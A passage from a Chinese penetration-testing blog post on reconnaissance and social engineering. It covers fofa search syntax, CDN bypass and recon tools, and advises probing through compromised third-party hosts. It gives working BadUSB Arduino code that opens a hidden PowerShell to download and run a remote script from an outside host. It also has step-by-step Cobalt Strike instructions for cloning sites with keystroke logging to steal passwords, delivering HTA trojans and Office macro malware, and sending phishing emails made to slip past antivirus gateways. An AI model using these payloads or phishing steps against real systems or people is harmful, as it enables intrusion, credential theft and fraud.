</li>
<li><p>把google可能忽略的字列如查询范围<br> <code>–</code> 把某个字忽略<br> <code>~</code> 同意词<br> <code>.</code> 单一的通配符</p>
</li>
<li><p>通配符，可代表多个字母</p>
</li>
<li><p><code>&quot;&quot;</code> 精确查询</p>
</li>
</ul>
<h3 id="⽹络空间搜索引擎"><a href="#⽹络空间搜索引擎" class="headerlink" title="⽹络空间搜索引擎"></a>⽹络空间搜索引擎</h3><p>常用网络空间搜索引擎有shodan，censys，zoomeye，fofa，quanke等。用于搜索公网上开放端口的 IP。</p>
<p><strong>fofa 语法:</strong></p>
<ul>
<li><code>title=&quot;abc&quot;</code> 从标题中搜索abc。</li>
<li><code>header=&quot;abc&quot;</code> 从http头中搜索abc。</li>
<li><code>body=&quot;abc&quot;</code> 从html正⽂中搜索abc。</li>
<li><code>domain=&quot;qq.com&quot;</code> 搜索根域名带有qq.com的⽹站。</li>
<li><code>host=&quot;.gov.cn&quot;</code> 从url中搜索.gov.cn,注意搜索要⽤host作为名称。</li>
<li><code>port=&quot;443&quot;</code> 查找对应443端⼝的资产。</li>
<li><code>ip=&quot;1.1.1.1&quot;</code> 从ip中搜索包含1.1.1.1的⽹站,注意搜索要⽤ip作为名称。</li>
<li><code>protocol=&quot;https&quot;</code> 搜索指定协议类型(在开启端⼝扫描的情况下有效)。</li>
<li><code>city=&quot;Hangzhou&quot;</code> 搜索指定城市的资产。</li>
<li><code>region=&quot;Zhejiang&quot;</code> 搜索指定⾏政区的资产。</li>
<li><code>country=&quot;CN&quot;</code> 搜索指定国家(编码)的资产。</li>
<li><code>cert=&quot;google&quot;</code> 搜索证书(https或者imaps等)中带有google的资产。</li>
<li><code>banner=users &amp;&amp; protocol=ftp</code> 搜索FTP协议中带有users⽂本的资产。</li>
<li><code>type=service</code> 搜索所有协议资产，⽀持subdomain和service两种。</li>
<li><code>os=windows</code> 搜索Windows资产。</li>
<li><code>server==&quot;Microsoft-IIS/7.5&quot;</code> 搜索IIS 7.5服务器。</li>
<li><code>app=&quot;海康威视-视频监控&quot;</code> 搜索海康威视设备，</li>
<li><code>after=&quot;2017&quot; &amp;&amp; before=&quot;2017-10-01&quot;</code> 时间范围段搜索。 after是⼤于并且等于，<br>before是⼩于，这⾥ after&#x3D;”2017” 就是⽇期⼤于并且等于 2017-01-01 的数据，⽽ before&#x3D;”2017-10-01”<br>则是⼩于 2017-10-01 的数据</li>
<li><code>asn=&quot;19551&quot;</code> 搜索指定asn的资产。⼤型企业会有⾃⼰独⽴的asn号</li>
<li><code>org=&quot;Amazon.com, Inc.&quot;</code> 搜索指定org(组织)的资产。</li>
<li><code>base_protocol=&quot;udp&quot;</code> 搜索指定udp协议的资产。</li>
<li><code>is_ipv6=true</code> 搜索ipv6的资产,只接受true和false。</li>
<li><code>is_domain=true</code> 搜索域名的资产,只接受true和false。</li>
<li><code>ip_ports=&quot;80,443&quot;</code> 或者 ports&#x3D;”80,443” 搜索同时开放80和443端⼝的ip资产(以ip为单位的资产数据)。</li>
<li><code>ip_country=&quot;CN&quot;</code> 搜索中国的ip资产(以ip为单位的资产数据)。</li>
<li><code>ip_region=&quot;Zhejiang&quot;</code> 搜索指定⾏政区的ip资产(以ip为单位的资产数据)。</li>
<li><code>ip_city=&quot;Hangzhou&quot;</code> 搜索指定城市的ip资产(以ip为单位的资产数据)。</li>
<li><code>ip_after=&quot;2019-01-01&quot;</code> 搜索2019-01-01以后的ip资产(以ip为单位的资产数据)。</li>
<li><code>ip_before=&quot;2019-01-01&quot;</code> 搜索2019-01-01以前的ip资产(以ip为单位的资产数据)。</li>
</ul>
<p>可以用fofa_view。</p>
<h3 id="域名解析查询"><a href="#域名解析查询" class="headerlink" title="域名解析查询"></a>域名解析查询</h3><p>参考：<a class="link"   target="_blank" rel="noopener" href="https://zhuanlan.zhihu.com/p/435208610" >https://zhuanlan.zhihu.com/p/435208610 <i class="fa-regular fa-arrow-up-right-from-square fa-sm"></i></a></p>
<p>dig，nslookup。</p>
<h3 id="注册信息查询"><a href="#注册信息查询" class="headerlink" title="注册信息查询"></a>注册信息查询</h3><p>whois。</p>
<h3 id="域名信息收集"><a href="#域名信息收集" class="headerlink" title="域名信息收集"></a>域名信息收集</h3><p>dnsenum。</p>
<h1 id="主动信息收集"><a href="#主动信息收集" class="headerlink" title="主动信息收集"></a>主动信息收集</h1><p>指通过一定的方式（系统自带命令或者其他工具），<strong>直接与目标系统或者主机进行交互通信</strong>，以达到收集信息的目的。</p>
<h2 id="主动信息收集须知"><a href="#主动信息收集须知" class="headerlink" title="主动信息收集须知"></a>主动信息收集须知</h2><p>使用受控的第三方电脑进行探测。使用代理或者已经被控制的主机。做好被封杀的准备。使用噪声迷惑目标，掩藏真实的的探测流量扫描，发送不同的探测，根据返回结果判断目标状态，主动信息收集通常是在被动信息收集之后分析出重要攻击⾯或者⽬标重要信息的时候再针对性地去做主动信息收集，在主动信息收集的时候通常持续时间⽐较⻓⽽且会通过各种不同的⽅式与⽬标交互。实战中最常⽤的⼿段是模拟或者伪装正常的业务流程与⽬标交互。</p>
<h2 id="关于CDN的识别与绕过"><a href="#关于CDN的识别与绕过" class="headerlink" title="关于CDN的识别与绕过"></a>关于CDN的识别与绕过</h2><h3 id="CDN识别"><a href="#CDN识别" class="headerlink" title="CDN识别"></a>CDN识别</h3><p>多地ping，返回的IP不同目标就存在CND。</p>
<h3 id="CDN绕过"><a href="#CDN绕过" class="headerlink" title="CDN绕过"></a>CDN绕过</h3><p>这里不去介绍CND是什麼，为什麼出现了。</p>
<h4 id="1-通过国外-ping-域名"><a href="#1-通过国外-ping-域名" class="headerlink" title="1. 通过国外 ping 域名"></a>1. 通过国外 ping 域名</h4><h4 id="2-dns历史记录"><a href="#2-dns历史记录" class="headerlink" title="2.dns历史记录"></a>2.dns历史记录</h4><p><a class="link"   target="_blank" rel="noopener" href="https://webiplookup.com/" >https://webiplookup.com/ <i class="fa-regular fa-arrow-up-right-from-square fa-sm"></i></a></p>
<h4 id="3-边缘业务的子域名"><a href="#3-边缘业务的子域名" class="headerlink" title="3.边缘业务的子域名"></a>3.边缘业务的子域名</h4><p>边缘业务一般用的少，不会挂CDN。比如微信小程序，app客户端等。</p>
<h4 id="4-邮箱服务器"><a href="#4-邮箱服务器" class="headerlink" title="4.邮箱服务器"></a>4.邮箱服务器</h4><p>邮箱不支持CDN，一定是站点的真实IP。</p>
<h2 id="主动信息收集的方式"><a href="#主动信息收集的方式" class="headerlink" title="主动信息收集的方式"></a>主动信息收集的方式</h2><h3 id="主域名收集"><a href="#主域名收集" class="headerlink" title="主域名收集"></a>主域名收集</h3><p>搜索引擎，备案网站，企查查，天眼查，小蓝本，爱企查等等。还可以用 <code>ENScan_GO</code>…</p>
<h3 id="子域名收集"><a href="#子域名收集" class="headerlink" title="子域名收集"></a>子域名收集</h3><p>oneforall，7ks，jsfinder，layer子域名挖掘机…</p>
<h3 id="目录扫描"><a href="#目录扫描" class="headerlink" title="目录扫描"></a>目录扫描</h3><p>dirsearch，御剑…</p>
<h3 id="端口扫描"><a href="#端口扫描" class="headerlink" title="端口扫描"></a>端口扫描</h3><p>masscan，mmap，goby，御剑…</p>
<h3 id="指纹识别"><a href="#指纹识别" class="headerlink" title="指纹识别"></a>指纹识别</h3><p><a href="whatweb.bugscaner.com/look/">whatweb</a>，Wappalyzer插件，goby，ehole，glass…</p>
<h3 id="漏洞扫描"><a href="#漏洞扫描" class="headerlink" title="漏洞扫描"></a>漏洞扫描</h3><p>rad+xray，awvs，vulmap，nessus，appscan，nuclei…</p>
<h3 id="WAF识别"><a href="#WAF识别" class="headerlink" title="WAF识别"></a>WAF识别</h3><p>wafw00f…</p>
<h1 id="社会工程学"><a href="#社会工程学" class="headerlink" title="社会工程学"></a>社会工程学</h1><p>可以看些心理学和社工相关的书籍，找一些社工库（这个就不细说了……）。</p>
<h2 id="敏感数据收集"><a href="#敏感数据收集" class="headerlink" title="敏感数据收集"></a>敏感数据收集</h2><p>凌⻛云：<a class="link"   target="_blank" rel="noopener" href="https://www.lingfengyun.com/" >https://www.lingfengyun.com/ <i class="fa-regular fa-arrow-up-right-from-square fa-sm"></i></a><br>蓝菊花：<a class="link"   target="_blank" rel="noopener" href="http://www.lanjuhua.com/" >http://www.lanjuhua.com/ <i class="fa-regular fa-arrow-up-right-from-square fa-sm"></i></a><br>⼤⼒盘：<a class="link"   target="_blank" rel="noopener" href="https://www.dalipan.com/" >https://www.dalipan.com/ <i class="fa-regular fa-arrow-up-right-from-square fa-sm"></i></a><br>猪猪盘：<a class="link"   target="_blank" rel="noopener" href="http://www.zhuzhupan.com/" >http://www.zhuzhupan.com/ <i class="fa-regular fa-arrow-up-right-from-square fa-sm"></i></a><br>PanSou：<a class="link"   target="_blank" rel="noopener" href="http://www.pansou.com/" >http://www.pansou.com/ <i class="fa-regular fa-arrow-up-right-from-square fa-sm"></i></a><br>盘⻜⻜：<a class="link"   target="_blank" rel="noopener" href="https://panfeifei.com/" >https://panfeifei.com/ <i class="fa-regular fa-arrow-up-right-from-square fa-sm"></i></a></p>
<h2 id="Badusb"><a href="#Badusb" class="headerlink" title="Badusb"></a>Badusb</h2><p><del>慎用，不多讲了，容易被蓝方抓</del>，可以在某东某宝去买。参考链接：<a class="link"   target="_blank" rel="noopener" href="https://cloud.tencent.com/developer/article/1544687" >https://cloud.tencent.com/developer/article/1544687 <i class="fa-regular fa-arrow-up-right-from-square fa-sm"></i></a></p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/2023/12/26/%E6%B8%97%E9%80%8F%E6%89%8B%E6%9C%AD%E4%B9%8B%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86/image-20240203160434673.png"
                      alt="image-20240203160434673"
                ></p>
<p>2.0 版本以上会做自动识别，不用修改。然后直接写代码即可。这段代码的效果会把我的subl打开，其他的可以自行准备，比如弹个shell。</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/2023/12/26/%E6%B8%97%E9%80%8F%E6%89%8B%E6%9C%AD%E4%B9%8B%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86/image-20240203160416941.png"
                      alt="image-20240203160416941"
                ></p>
<div class="highlight-container" data-rel="Tcl"><figure class="iseeu highlight tcl"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br></pre></td><td class="code"><pre><span class="line">void setup()&#123;//初始化 </span><br><span class="line">Keyboard.begin();//开始键盘通讯 </span><br><span class="line">delay(<span class="number">5000</span>);//延时 </span><br><span class="line">Keyboard.press(KEY_LEFT_GUI);//win键 </span><br><span class="line">delay(<span class="number">500</span>);</span><br><span class="line">Keyboard.press(&#x27;r&#x27;);//r键</span><br><span class="line">delay(<span class="number">500</span>); </span><br><span class="line">Keyboard.release(KEY_LEFT_GUI);</span><br><span class="line">Keyboard.release(&#x27;r&#x27;); </span><br><span class="line">Keyboard.press(KEY_CAPS_LOCK);//利用开大写输小写绕过输入法</span><br><span class="line">Keyboard.release(KEY_CAPS_LOCK);</span><br><span class="line">delay(<span class="number">500</span>);</span><br><span class="line">Keyboard.println(<span class="string">&quot;CMD&quot;</span>);</span><br><span class="line">delay(<span class="number">500</span>);</span><br><span class="line">Keyboard.press(KEY_RETURN); </span><br><span class="line">Keyboard.release(KEY_RETURN); </span><br><span class="line">delay(<span class="number">3000</span>);</span><br><span class="line">Keyboard.println(<span class="string">&quot;powershell -windowstyle hidden IEX (New-Object Net.WebClient).DownloadString(&#x27;http://8.8.8.8/main.ps1&#x27;) &quot;</span>);</span><br><span class="line">Keyboard.press(KEY_RETURN); </span><br><span class="line">Keyboard.release(KEY_RETURN);</span><br><span class="line">Keyboard.press(KEY_CAPS_LOCK); </span><br><span class="line">Keyboard.release(KEY_CAPS_LOCK);</span><br><span class="line">Keyboard.end();//结束键盘通讯 </span><br><span class="line">Keyboard.begin();//开始键盘通讯 </span><br><span class="line">delay(<span class="number">5000</span>);//延时 </span><br><span class="line">Keyboard.press(KEY_LEFT_GUI);//win键 </span><br><span class="line">delay(<span class="number">500</span>);</span><br><span class="line">Keyboard.press(&#x27;r&#x27;);//r键</span><br><span class="line">delay(<span class="number">500</span>); </span><br><span class="line">Keyboard.release(KEY_LEFT_GUI);</span><br><span class="line">Keyboard.release(&#x27;r&#x27;); </span><br><span class="line">Keyboard.release(KEY_CAPS_LOCK);</span><br><span class="line">delay(<span class="number">500</span>);</span><br><span class="line">Keyboard.println(<span class="string">&quot;CMD&quot;</span>);</span><br><span class="line">delay(<span class="number">500</span>);</span><br><span class="line">Keyboard.press(KEY_RETURN); </span><br><span class="line">Keyboard.release(KEY_RETURN); </span><br><span class="line">delay(<span class="number">3000</span>);</span><br><span class="line">Keyboard.println(<span class="string">&quot;powershell -windowstyle hidden IEX (New-Object Net.WebClient).DownloadString(&#x27;http://8.8.8.8/payload.ps1&#x27;) &quot;</span>);</span><br><span class="line">Keyboard.press(KEY_RETURN); </span><br><span class="line">Keyboard.release(KEY_RETURN);</span><br><span class="line">Keyboard.press(KEY_CAPS_LOCK); </span><br><span class="line">Keyboard.release(KEY_CAPS_LOCK);</span><br><span class="line">Keyboard.end();//结束键盘通讯 </span><br><span class="line">&#125;</span><br><span class="line">void loop() &#123;&#125;</span><br></pre></td></tr></table></figure></div>

<h2 id="水坑攻击"><a href="#水坑攻击" class="headerlink" title="水坑攻击"></a>水坑攻击</h2><p><strong>水坑攻击</strong>：watering  hole。在受害者必经之路设置一个水坑，就是陷进。常见的做法是攻击者分析攻击目标的上网活动规律，经常访问哪些网站，然后利用网站漏洞在其中植入攻击代码，用户访问该网站就中招了。这种方式隐蔽性高，成功率较高。但有一定条件，网站要有漏洞可利用，以便用于部署恶意代码。用户访问被“加工”过的网站时，攻击代码会在客户端植入恶意代码或者直接窃取用户信息，有些就是将用户跳转到其他恶意网站。这些恶意网站中，恶意软件正等待将其与后续的网络钓鱼或勒索软件攻击挂钩。做<strong>APT</strong>用到比较多。常用的就是xss篡改页面（flash）等骗它下马。</p>
<p><strong>水坑攻击的原理</strong></p>
<p>水坑攻击的基本步骤通常包括以下几步：</p>
<ol>
<li>侦察：攻击者首先会对目标群体进行详细的侦察，了解他们的兴趣、习惯以及经常访问的网站。</li>
<li>选择目标：一旦确定了目标群体，攻击者会选择一个或多个受欢迎的网站作为进攻的目标，这些网站是目标群体经常访问的“水坑”。</li>
<li>渗透网站：攻击者会使用各种手段渗透这些网站，包括利用已知的安全漏洞、社会工程学或其他黑客技术。</li>
<li>植入恶意代码：成功渗透后，攻击者会在网站中植入恶意代码，这些代码可能是直接的恶意软件，也可能是用来重定向用户到恶意网站的脚本。</li>
<li>传播恶意软件：当目标用户访问受感染的网站时，恶意代码会自动执行，可能会无声无息地在用户的设备上安装恶意软件。</li>
<li>数据泄露或系统控制：一旦设备被感染，攻击者可以进行各种恶意活动，如窃取敏感数据、安装勒索软件或建立后门以便未来访问。</li>
</ol>
<p><strong>水坑攻击案例</strong></p>
<p>一个典型的水坑攻击案例如下：</p>
<ol>
<li>假设攻击者想要针对一家大型企业的员工，他们会研究员工的在线活动，发现许多员工都在特定的行业新闻网站上活跃。</li>
<li>攻击者找到该新闻网站的安全漏洞，并利用漏洞植入了恶意代码。</li>
<li>攻击者接下来不需要进行任何动作，只需等待目标员工访问新闻网站。</li>
<li>当员工浏览新闻网站时，他们的设备自动下载并执行恶意代码，造成感染。</li>
<li>攻击者利用感染的设备来进一步渗透企业网络，窃取数据或发起更广泛的攻击。</li>
</ol>
<h2 id="钓鱼攻击"><a href="#钓鱼攻击" class="headerlink" title="钓鱼攻击"></a>钓鱼攻击</h2><p>cs有站点克隆，目标信息获取，java执行，浏览器自动攻击等功能，另外也可以自己制作一些钓鱼页面。常用的就是flash，让人以为自己的flash版本太低，点击下载即可完成欺骗。gophish则是一款开源的钓鱼平台，也非常好用，后面会介绍。</p>
<h3 id="钓鱼网站"><a href="#钓鱼网站" class="headerlink" title="钓鱼网站"></a>钓鱼网站</h3><h4 id="使用CS克隆网页"><a href="#使用CS克隆网页" class="headerlink" title="使用CS克隆网页"></a>使用CS克隆网页</h4><p>没有反扒，直接保存即可。勾选Log Keystrokes on cloned site后，记录键盘操作，通过<code>view</code>下的<code>weblog</code>可以获取用户的账号密码等。</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/2023/12/26/%E6%B8%97%E9%80%8F%E6%89%8B%E6%9C%AD%E4%B9%8B%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86/image-20240415203212900.png"
                      alt="image-20240415203212900"
                ></p>
<ul>
<li>Clone URL：克隆目标网站的URL</li>
<li>注意问题：URL需要添加http协议和端口（80）</li>
<li>Local URL：本地克隆路径</li>
<li>Local Host：本地主机IP</li>
<li>Local Port：本地端口</li>
<li>Attack：克隆后目标网站执行脚本，如：flash漏洞</li>
</ul>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/2023/12/26/%E6%B8%97%E9%80%8F%E6%89%8B%E6%9C%AD%E4%B9%8B%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86/image-20240415203317189.png"
                      alt="image-20240415203317189"
                ></p>
<h4 id="结合HTA木马"><a href="#结合HTA木马" class="headerlink" title="结合HTA木马"></a>结合HTA木马</h4><p>先不做免杀，免杀会单写一个文章。</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/2023/12/26/%E6%B8%97%E9%80%8F%E6%89%8B%E6%9C%AD%E4%B9%8B%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86/image-20240416143400643.png"
                      alt="image-20240416143400643"
                ></p>
<p>生成HTML后门(HTA文件), 选择相应的监听器和模式,有三种模式,分别为<code>Powershell</code>、<code>VBA</code>、<code>Executable</code>。</p>
<blockquote>
<p>Executable 将会在hta文件中内嵌一个PE文件<br>Powershell 将会在hta文件中内嵌一段Powershell代码<br>VBA 将会在hta文件中内嵌一段VBA代码</p>
</blockquote>
<p>建议使用 powershell。</p>
<p>制作完成使用文件托管上传服务器，网站克隆选择攻击载荷时选择生成的hta木马。访问网站时便会自动下载木马，运行则会自动上线。</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/2023/12/26/%E6%B8%97%E9%80%8F%E6%89%8B%E6%9C%AD%E4%B9%8B%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86/image-20240416153627577.png"
                      alt="image-20240416153627577"
                ></p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/2023/12/26/%E6%B8%97%E9%80%8F%E6%89%8B%E6%9C%AD%E4%B9%8B%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86/image-20240416153604311.png"
                      alt="image-20240416153604311"
                ></p>
<h3 id="邮件钓鱼"><a href="#邮件钓鱼" class="headerlink" title="邮件钓鱼"></a>邮件钓鱼</h3><h4 id="制作一个office宏病毒"><a href="#制作一个office宏病毒" class="headerlink" title="制作一个office宏病毒"></a>制作一个office宏病毒</h4><p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/2023/12/26/%E6%B8%97%E9%80%8F%E6%89%8B%E6%9C%AD%E4%B9%8B%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86/image-20240416160852538.png"
                      alt="image-20240416160852538"
                ></p>
<p>视图-&gt;宏-&gt;查看宏-&gt;给宏起名-&gt;编辑宏</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/2023/12/26/%E6%B8%97%E9%80%8F%E6%89%8B%E6%9C%AD%E4%B9%8B%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86/image-20240416161003650.png"
                      alt="image-20240416161003650"
                ></p>
<p>在project中添加代码-&gt;另存为.docm。</p>
<h4 id="发送钓鱼邮件"><a href="#发送钓鱼邮件" class="headerlink" title="发送钓鱼邮件"></a>发送钓鱼邮件</h4><p>利用Cobalt Strike生成钓鱼邮件对企业或者网站的邮箱进行攻击, 钓鱼邮件的内容通常包含Office宏木马附件, 钓鱼网站等等</p>
<p>Cobalt Strike钓鱼邮件攻击主要步骤:</p>
<ul>
<li>创建一个目标列表</li>
<li>创建一个钓鱼模版</li>
<li>选择通过哪个邮件服务器发送邮件</li>
<li>发送邮件</li>
</ul>
<p>当你想使用钓鱼邮件来获得内网的一个跳板时，你需要注意以下几点：</p>
<ol>
<li>你发送的邮件是给具体的某个人看的，所以这封“钓鱼”邮件做的必须要跟真的一样，可能还需要加入一些诱惑性的语句来使对方交互。</li>
<li>你必须要使邮件通过反病毒邮件网关</li>
<li>绕过杀毒软件以及应用白名单</li>
</ol>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/2023/12/26/%E6%B8%97%E9%80%8F%E6%89%8B%E6%9C%AD%E4%B9%8B%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86/image-20240416162136473.png"
                      alt="image-20240416162136473"
                ></p>
<blockquote>
<p>Targets:存有目标邮箱及收件人信息的文本文件</p>
<p>Template:邮件模板文件</p>
<p>Attachment:附件</p>
<p>Embed URL:填写url钓鱼链接, 可将邮件的内置链接替换掉。此处我填写了带有键盘记录功能的克隆网站</p>
<p>Mail Server: 邮箱服务器相关信息</p>
<p>Bounce to:邮箱地址</p>
</blockquote>
<p><strong>targets</strong></p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/2023/12/26/%E6%B8%97%E9%80%8F%E6%89%8B%E6%9C%AD%E4%B9%8B%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86/image-20240416162056606.png"
                      alt="image-20240416162056606"
                ></p>
<p><strong>template</strong></p>
<p>从已有邮箱导出的eml文件。</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/2023/12/26/%E6%B8%97%E9%80%8F%E6%89%8B%E6%9C%AD%E4%B9%8B%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86/image-20240416162239143.png"
                      alt="image-20240416162239143"
                ></p>
<p><strong>Attachment：</strong></p>
<p>添加我们的office宏病毒。</p>
<p><strong>Embed url：</strong></p>
<p>填写搭建好的网站。</p>
<p><strong>mailserver：</strong></p>
<p>找到 <strong>POP3&#x2F;IMAP&#x2F;SMTP&#x2F;Exchange&#x2F;CardDAV&#x2F;CalDAV服务</strong>，获取授权码。然后配置mailserver。</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/2023/12/26/%E6%B8%97%E9%80%8F%E6%89%8B%E6%9C%AD%E4%B9%8B%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86/image-20240416162907217.png"
                      alt="image-20240416162907217"
                ></p>
<blockquote>
<p>　　<strong>SMTP host：</strong> SMTP服务地址</p>
<p>　　<strong>SMTP Port：</strong>即允许SMTP服务的端口号。和上面的host配套来的，ssl一般使用465</p>
<p>　　<strong>Username：</strong>用户名。</p>
<p>　　<strong>Password（密码）：</strong>就是前面开启SMTP服务是的那串授权码。</p>
<p>　　<strong>Random Delay：</strong>默认0就好了。</p>
<p>　　<strong>Connetion：</strong>连接协议，选则 SSL。</p>
<p>​		<strong>bounce to：</strong>这个是根据你的邮件名来填写。</p>
</blockquote>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/2023/12/26/%E6%B8%97%E9%80%8F%E6%89%8B%E6%9C%AD%E4%B9%8B%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86/image-20240416170447482.png"
                      alt="image-20240416170447482"
                ></p>

        </div>

        
            <div class="post-copyright-info w-full my-8 px-2 sm:px-6 md:px-8">
                <div class="article-copyright-info-container">
    <ul>
        <li><strong>Title:</strong> 渗透手札之信息收集</li>
        <li><strong>Author:</strong> 韩乔落</li>
        <li><strong>Created at
                :</strong> 2023-12-26 18:54:55</li>
        
            <li>
                <strong>Updated at
                    :</strong> 2024-04-28 19:47:36
            </li>
        
        <li>
            <strong>Link:</strong> https://jelasin.github.io/2023/12/26/渗透手札之信息收集/
        </li>
        <li>
            <strong>
                License:
            </strong>
            

            
                This work is licensed under <a class="license" target="_blank" rel="noopener" href="https://creativecommons.org/licenses/by-nc-sa/4.0">CC BY-NC-SA 4.0</a>.
            
        </li>
    </ul>
</div>

            </div>
        

        
            <ul class="post-tags-box text-lg mt-1.5 flex-wrap justify-center flex md:hidden">
                
                    <li class="tag-item mx-0.5">
                        <a href="/tags/%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86/">#信息收集</a>&nbsp;
                    </li>
                
            </ul>
        

        

        
            <div class="article-nav my-8 flex justify-between items-center px-2 sm:px-6 md:px-8">
                
                    <div class="article-prev border-border-color shadow-redefine-flat shadow-shadow-color-2 rounded-medium px-4 py-2 hover:shadow-redefine-flat-hover hover:shadow-shadow-color-2">
                        <a class="prev"
                        rel="prev"
                        href="/2024/01/19/%E6%B8%97%E9%80%8F%E6%89%8B%E6%9C%AD%E4%B9%8B%E5%85%8D%E6%9D%80%E4%B8%8E%E8%BF%9C%E6%8E%A7/"
                        >
                            <span class="left arrow-icon flex justify-center items-center">
                                <i class="fa-solid fa-chevron-left"></i>
                            </span>
                            <span class="title flex justify-center items-center">
                                <span class="post-nav-title-item">渗透手札之免杀与远控</span>
                                <span class="post-nav-item">Prev posts</span>
                            </span>
                        </a>
                    </div>
                
                
                    <div class="article-next border-border-color shadow-redefine-flat shadow-shadow-color-2 rounded-medium px-4 py-2 hover:shadow-redefine-flat-hover hover:shadow-shadow-color-2">
                        <a class="next"
                        rel="next"
                        href="/2023/12/09/%E6%B7%B1%E5%85%A5%E7%90%86%E8%A7%A3Pwn_Base_knowledge/"
                        >
                            <span class="title flex justify-center items-center">
                                <span class="post-nav-title-item">深入理解Pwn_Base_knowledge</span>
                                <span class="post-nav-item">Next posts</span>
                            </span>
                            <span class="right arrow-icon flex justify-center items-center">
                                <i class="fa-solid fa-chevron-right"></i>
                            </span>
                        </a>
                    </div>
                
            </div>
        


        
            <div class="comment-container px-2 sm:px-6 md:px-8 pb-8">
                <div class="comments-container mt-10 w-full ">
    <div id="comment-anchor" class="w-full h-2.5"></div>
    <div class="comment-area-title w-full my-1.5 md:my-2.5 text-xl md:text-3xl font-bold">
        Comments
    </div>
    

        
            
    <div id="giscus-container"></div>
    <script data-swup-reload-script defer>
        async function loadGiscus() {
            const giscusConfig = {
                'src': 'https://giscus.app/client.js',
                'data-repo': 'jelasin/jelasin.github.io',
                'data-repo-id': 'R_kgDOKVydDA',
                'data-category': 'Announcements',
                'data-category-id': 'DIC_kwDOKVydDM4CZe2W',
                'data-mapping': 'pathname',
                'data-strict': '0',
                'data-reactions-enabled': '1',
                'data-emit-metadata': '1',
                'data-theme': 'preferred_color_scheme',
                'data-lang': 'zh-CN',
                'data-input-position': 'bottom',
                'data-loading': 'not-lazy',
                'crossorigin': 'anonymous',
                'async': true
            }
            const giscusScript = document.createElement('script');
            for (const key in giscusConfig) {
                giscusScript.setAttribute(key, giscusConfig[key]);
            }
            document.getElementById('giscus-container').appendChild(giscusScript);
        }
        if ('true') {
            let loadGiscusTimeout = setTimeout(() => {
                loadGiscus();
                clearTimeout(loadGiscusTimeout);
            }, 1000);
        } else {
            document.addEventListener('DOMContentLoaded', loadGiscus);
        }
    </script>


        
        
    
</div>

            </div>
        
    </div>

    
        <div class="toc-content-container">
            <div class="post-toc-wrap">
    <div class="post-toc">
        <div class="toc-title">On this page</div>
        <div class="page-title">渗透手札之信息收集</div>
        <ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#%E6%A6%82%E8%BF%B0"><span class="nav-text">概述</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E8%A2%AB%E5%8A%A8%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86"><span class="nav-text">被动信息收集</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E8%A2%AB%E5%8A%A8%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86%E7%AE%80%E4%BB%8B"><span class="nav-text">被动信息收集简介</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E8%A2%AB%E5%8A%A8%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86%E7%9A%84%E5%86%85%E5%AE%B9"><span class="nav-text">被动信息收集的内容</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E8%A2%AB%E5%8A%A8%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86%E7%9A%84%E7%9B%AE%E7%9A%84"><span class="nav-text">被动信息收集的目的</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E8%A2%AB%E5%8A%A8%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86%E6%96%B9%E5%BC%8F"><span class="nav-text">被动信息收集方式</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" 